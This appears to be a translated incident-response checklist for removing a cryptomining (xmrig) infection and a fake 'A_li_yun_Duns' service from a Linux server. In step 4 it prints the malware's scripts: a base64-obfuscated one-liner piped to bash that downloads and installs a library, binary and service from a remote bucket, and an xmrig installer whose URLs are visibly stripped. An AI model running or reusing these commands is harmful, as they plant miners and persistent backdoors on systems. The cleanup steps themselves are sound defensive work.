1. Check the self-startup items
Execute systemctl list-unit-files --type=service | grep enabled command to list all the self-startup items, there are abnormal startup items to execute systemctl disable A_li_yun_Duns.service to delete. A_li_yun_Duns.service is the name of the self-startup item. service is the name of the self-startup item.
2. Check system users
Execute vi /etc/passwd to check the system users, if there are any abnormal users, disable them, and execute passwd -l user name.
3. Check timed tasks
Run crontab -e to see if any default tasks have been added to the timer. If there are any, comment them out or delete them. Delete the script file it executes along with it.
4. Check the root directory for abnormal files
The exception file in this root directory is, update_udp.sh, and the following is the script content
#!/bin/bash
cd /root;wget /image/image/xmrig-6.21.;tar -zxvf xmrig-6.21.;systemctl stop ;rm -rf /etc/systemd/system/;wget /icon/;sysctl -w vm.nr_hugepages=$((1168+$(nproc)));mv /etc/systemd/system/;systemctl daemon-reload;systemctl enable ;systemctl start
The following is the content of the update_udp.sh script, the command is encrypted with base64, and needs to be decrypted with base64.
#!/bin/bash
echo "IyEvYmluL2Jhc2gKY3VybCAtcyBodHRwOi8vYnBnLXRlc3Qub3NzLWNuLWNoZW5nZHUuYWxpeXVuY3MuY29tL3NDaGFuZ2UvMjAyNC8wMi8yNy9saWJodi5zbyAtbyAvb3B0L2xpYmh2LnNvO2NwIC9vcHQvbGliaHYuc28gL3Vzci9saWIvbGliaHYuc287Y3AgL29wdC9saWJodi5zbyAvdXNyL2xpYjY0L2xpYmh2LnNvO2N1cmwgLXMgaHR0cDovL2JwZy10ZXN0Lm9zcy1jbi1jaGVuZ2R1LmFsaXl1bmNzLmNvbS9zQ2hhbmdlLzIwMjQvMDIvMjcvc3lzZXRtZCAtbyAvb3B0L3N5c2V0bWQ7Y2htb2QgNzc3IC9vcHQvc3lzZXRtZDtjdXJsIC1zIGh0dHA6Ly9icGctdGVzdC5vc3MtY24tY2hlbmdkdS5hbGl5dW5jcy5jb20vc0NoYW5nZS8yMDI0LzAyLzI3L3N5c2V0bWQuc2VydmljZSAtbyAvZXRjL3N5c3RlbWQvc3lzdGVtL3N5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgZGFlbW9uLXJlbG9hZDtzeXN0ZW1jdGwgZW5hYmxlIHN5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgc3RhcnQgc3lzZXRtZC5zZXJ2aWNlOw=="|base64 -di|bash -s
Interpret the contents of the script and remove the files involved
5. Check for unfamiliar directories in the /root directory
Discover xmrig catalog cleanup
6. Check systemctl service
Execute cd /etc/systemd/system to check if there are any abnormal service files in the directory, and this time, the abnormal file is A_li_yun_Duns.service, which is disguised as AliCloud security service.
processing strategy
1. Minimize the number of ports that are open to the public network, especially for mq.
2. Close all security group outbound ports, and open whichever one is used. The mining program needs to request the network to receive the task, so that the mining program has no task to execute.